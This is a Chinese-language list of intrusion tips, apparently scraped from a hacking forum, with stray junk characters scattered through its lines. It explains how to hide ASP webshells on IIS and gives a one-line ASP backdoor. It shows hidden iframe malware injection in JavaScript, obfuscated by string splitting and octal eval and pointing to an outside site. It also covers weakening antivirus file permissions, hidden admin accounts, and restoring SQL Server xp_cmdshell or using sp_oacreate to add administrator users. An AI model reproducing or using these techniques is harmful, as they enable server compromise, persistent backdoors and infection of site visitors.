- R. |9 z; b- Q. H* K, G+ B! }用AT这个命令以交互的方式运行cmd.exe 这样运行的cmd.exe是system权限。) P6 h% I' a5 [3 E5 M; [# r2 u& g# J
7 J+ T4 O4 W9 e% c$ `: [, |- f53、隐藏ASP后门的两种方法
; l! B. m0 ] t) Y. ^+ P1、建立非标准目录:mkdir images..\
r: a% s2 R4 h' h2 G+ H$ s+ U拷贝ASP木马至目录:copy c:\inetpub\wwwroot\dbm6.asp c:\inetpub\wwwroot\images..\news.asp) M6 K3 p3 X2 D4 v$ w9 J5 F6 q! w
通过web访问ASP木马:http://ip/images../news.asp?action=login
, w: f- S3 P9 M! x- Z如何删除非标准目录:rmdir images..\ /s
U5 T+ f% {; B2、Windows中的IIS会对以.asp结尾的目录中的文件进行解析,以达到我们隐藏自己的网页后门的目的:
, m- {3 P* x- R2 W4 @mkdir programme.asp1 u8 q: i$ c. e$ `1 e, i! h5 ?1 ~
新建1.txt文件内容:<!--#include file=”12.jpg”-->% o( s' w$ R" ~" A3 L, p
新建12.jpg文件内容:<%execute(request("l"))%> 或使用GIF与ASP合并后的文件- w+ V' P4 S& I8 f% s
attrib +H +S programme.asp' N: ]5 ~! H% I) ~- M/ A" y
通过web访问ASP一句话木马:http://ip/images/programme.asp/1.txt: s# d' U$ [+ z8 S: N! y& u
# }# B& K/ s/ W
54、attrib /d /s c:\windows +h +s,后windows目录变为隐藏+系统,隐藏属性为灰不可更改,windows目录下面的文件和目录并没有继承属性,原来是什么样还是什么样。9 k7 R8 {& A3 q+ [' Y
然后在利用attrib /d /s c:\windows -h -s,windows目录可以显示,隐藏属性可以再次选中。9 ]* w: |5 ]- N
4 G( K9 \. U$ D) G
55、JS隐蔽挂马
5 G- B, @9 o2 P3 ^0 _% g; J* \1.
1 d: B' m7 f7 g8 W5 Evar tr4c3="<iframe src=ht";
% K5 A) y) h) h" m6 ?tr4c3 = tr4c3+"tp:/";
; R0 E5 x/ T [7 ptr4c3 = tr4c3+"/ww";
# W; P; p! p1 b+ htr4c3 = tr4c3+"w.tr4";( l+ u" Y0 P* w! ?2 L) B2 l8 S
tr4c3 = tr4c3+"c3.com/inc/m";7 e9 ], Y7 f' k
tr4c3 = tr4c3+"m.htm style="display:none"></i";& z7 l W o+ X
tr4c3 =tr4c3+"frame>'";
( p s& ^! k+ `8 ? l& Wdocument.write(tr4c3);+ v8 U! ]8 U, J. O* t N8 W
避免被管理员搜索网马地址找出来。把变量名定义的和网站本身的接近些,混淆度增加。
5 w. k% t* d4 |2 {" w, E$ j! [: b+ i3 B
2.; n7 a2 S& D+ W4 N
转换进制,然后用EVAL执行。如
# L6 l* T" a4 e* x( g6 K" b1 ?2 Yeval("\144\157\143\165\155\145\156\164\56\167\162\151\164\145\40\50\42\74\151\146\162\141\155\145\40\163\162\143\75\150\164\164\160\72\57\57\167\167\167\56\164\162\64\143\63\56\143\157\155\57\151\156\143\57\155\155\56\150\164\155\40\163\164\171\154\145\75\42\42\144\151\163\160\154\141\171\72\156\157\156\145\42\42\76\74\57\151\146\162\141\155\145\76\42\51\73");
7 a5 P9 d& P6 h* Q不过这个有点显眼。0 L; N" k3 H# g, u/ d' H$ |# o9 p# ]
3.
) ^( M0 x% f5 R3 T0 _' R/ {1 Ndocument.write ('<iframe src=http://www.tr4c3.com/inc/mm.htm style="display:none"></iframe>');
1 [2 h& e( p% G6 i) X9 K- c最后一点,别忘了把文件的时间也修改下。7 S, {1 x* @' f5 _; Y
5 u9 p: s; h$ Y. E4 f9 @56.3389终端入侵常用DOS命令* U6 W4 q' g3 { `# j
taskkill taskkill /PID 1248 /t6 A E8 u% ~( j }# m
4 k. y3 N( a$ a4 A! |tasklist 查进程
; U8 r- p h5 N5 Q( [5 |8 t7 h! X2 `* l% L
cacls "C:\Program Files\ewido anti-spyware 4.0\guard.exe" /d:everyone 改、降低某文件权限' W& i7 _) G" J0 n: X8 ^
iisreset /reboot
. x5 D X/ E" q- I+ _# M4 r+ z: t! otsshutdn /reboot /delay:1 重起服务器( D1 Q0 ?& K( [( Y
- u; D9 w. F3 @. o% K1 a% H
logoff 12 要使用会话 ID(例如,会话 12)从会话中注销用户,/ A# T3 F7 G7 T z
+ r; U b) C6 q& j* a2 V( p( t2 Lquery user 查看当前终端用户在线情况% m0 W) R2 P) |* Q; W
4 u# L+ j$ U" |0 r' D
要显示有关所有会话使用的进程的信息,请键入:query process *8 h* R5 G( p6 \) _9 _7 O1 A& H
) k) ?/ N6 [$ z) l( Z
要显示有关会话 ID 2 使用的进程的信息,请键入:query process /ID:2; N9 Z, Z4 T. o, [) c2 ? R9 k9 r: f
' O# f! W) ~/ x. U! ~, ~要显示有关服务器 SERVER2 上所有活动会话的信息,请键入:query session /server:SERVER2: [9 u1 ]& r2 E2 L) c3 E& S
( T# l1 Y9 ], c2 f. a9 S$ {+ p
要显示有关当前会话 MODEM02 的信息,请键入:query session MODEM02
1 Y' M: y2 U' P5 p
$ a+ G$ o! A& z# m命令列:rundll32.exe user.exe,restartwindows 功能: 系统重启
4 ~' `# n: X# ` t: D
5 g% ]4 \* d# Z4 r# U- e- G命令列:rundll32.exe user.exe,exitwindows 功能: 关闭系统3 z! \: X' C' u% K3 K/ g
0 |/ }% \- d7 C& r( a2 s: E
命令列: rundll32.exe user.exe,restartwindows 功能: 强行关闭所有程式并重启机器。
' C3 A5 }0 m% P' w" R$ s% \6 m ~* |' S5 `6 O+ h
命令列: rundll32.exe user.exe,exitwindows 功能: 强行关闭所有程式并关机, {4 a; H# P( O0 t. p
6 V" J H1 A: T4 Q# ?2 v! l k, l- s
56、在地址栏或按Ctrl+O,输入:
* }0 L6 a. E' F6 vjavascript:s=document.documentElement.outerHTML;document.write('<body></body>');document.body.innerText=s;
: O2 t- l# c* h2 F: _, Q2 ?0 t6 T6 t( G Z* @ ]1 {
源代码就出来了。不论加密如何复杂,最终都要还原成浏览器可以解析的html代码,而documentElement.outerHTML正是最终的结果。" m5 Q! j) u- G% R* S
3 d8 d" W; N' q) K57、net user的时候,是不能显示加$的用户,但是如果不处理的话,' {( C k- n3 [: G
用net localgroup administrators是可以看到管理组下,加了$的用户的。9 o/ Y3 k# p' N+ ^8 i
* P8 {7 _& g6 b0 t) }7 r
58、 sa弱口令相关命令, ^# m' e- t* w; s0 L
3 g7 r; V ]* _. N一.更改sa口令方法:/ q2 x: D, R* e1 Z9 b
用sql综合利用工具连接后,执行命令:: E( V6 \, B1 w
exec sp_password NULL,'20001001','sa'
; n3 A3 P/ b2 _2 | f- ?$ v# h(提示:慎用!)! c3 R0 o" b3 U0 i$ c
' N% C; i6 H( c1 A; v/ C二.简单修补sa弱口令.9 u0 T4 z( @1 V4 U4 {# g! h4 y4 B
; B) U: J7 Z9 J6 `" A3 o3 {方法1:查询分离器连接后执行:: @; Y7 U# Z a6 a+ n0 |8 s2 g3 U
if exists (select * from p! Z+ ?% w' [0 D6 T( e
dbo.sysobjects where id = object_id(N'[dbo].[xp_cmdshell]') and4 D6 f& {3 A2 Y
OBJECTPROPERTY(id, N'IsExtendedProc') = 1)8 D! ~6 n; h+ ^
5 V6 w: T4 {# [& R- Rexec sp_dropextendedproc N'[dbo].[xp_cmdshell]'% N% k$ {, \8 V# G, d: h& a
+ _( K1 q) G" z4 R) U. P
GO5 O! C& F; s# d0 h2 |* S
& J9 u) @, |6 N然后按F5键命令执行完毕
) m3 M! v# \' E+ c& u8 c/ ^; p( _5 T4 p0 L; U# ]1 h* S/ F5 d
方法2:查询分离器连接后4 G1 }" E* q6 h( m0 ?
第一步执行:use master
# \* [; {. a$ N8 j1 r2 h: a2 v第二步执行:sp_dropextendedproc 'xp_cmdshell'0 k0 O* A6 |3 n
然后按F5键命令执行完毕5 W: A; r. h6 ]
, w; |- K1 C3 h3 E
5 n- S6 Z6 r. @0 O, _三.常见情况恢复执行xp_cmdshell.
9 T& b* |. i z/ F& W5 y5 G) L4 Y% S7 [& d9 I9 b
* P' H- b/ |; P, K8 a
1 未能找到存储过程'master..xpcmdshell'.
' a$ H9 z w4 b& R 恢复方法:查询分离器连接后,
: u* u" v. G$ y- j第一步执行:EXEC sp_addextendedproc xp_cmdshell,@dllname ='xplog70.dll'declare @o int5 c, y1 V4 w( |
第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'
4 k: g7 d% ~) v6 i: d' F/ e然后按F5键命令执行完毕, K: B. m7 {$ y9 D% [
; q. m2 _1 z" {3 O, {5 R& W
2 无法装载 DLL xpsql70.dll 或该DLL所引用的某一 DLL。原因126(找不到指定模块。)' e/ r0 L0 {$ @" q5 ~: U
恢复方法:查询分离器连接后,0 Q3 e S+ d6 `; w& o
第一步执行:sp_dropextendedproc "xp_cmdshell"
- D# {! i4 G% x6 P; J/ D: P t# M第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'' m; N: I% }2 G0 ]% q
然后按F5键命令执行完毕
4 ]( K9 O9 V9 q0 o6 i
' z( y5 F$ E- {* X3 无法在库 xpweb70.dll 中找到函数 xp_cmdshell。原因: 127(找不到指定的程序。)( i: u; K$ V/ d) w8 k7 `
恢复方法:查询分离器连接后,$ J% }7 I2 A# i9 m: z
第一步执行:exec sp_dropextendedproc 'xp_cmdshell'8 B$ L( F6 c: ]! C- r
第二步执行:exec sp_addextendedproc 'xp_cmdshell','xpweb70.dll' 7 d- u$ t. }8 s4 J! m! @
然后按F5键命令执行完毕' j d* r$ q/ e( \5 L: \
) r; ?. ?" k+ L% e四.终极方法.
& W7 l. N9 y, @# O如果以上方法均不可恢复,请尝试用下面的办法直接添加帐户:
, S- B3 {7 w/ f G" d; q查询分离器连接后,
/ o) ?3 }. m2 X6 G; ~8 r2000servser系统:, G# a4 D5 o9 Y6 F/ V0 {: i
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net user 用户名 密码 /add'0 a) ?0 x* q. t; q
* a# r! O9 N/ ]. L' ?/ `5 i' j/ N4 S
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net localgroup administrators 用户名 /add'( _. l0 _2 d* {) T. B+ s
: s9 \! Y O" \9 Q' jxp或2003server系统:5 o$ `2 r7 Y& _8 F* }( L9 {7 [$ C( s
% `( ~/ B8 q$ h. Y2 E+ \declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user 用户名 密码 /add'
( e, Z* v' _; S8 p7 t& E9 l; e" l% B/ p/ z- b5 e2 G$ ]
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrators 用户名 /add'
5 ~8 Z- {, | _+ b. @ |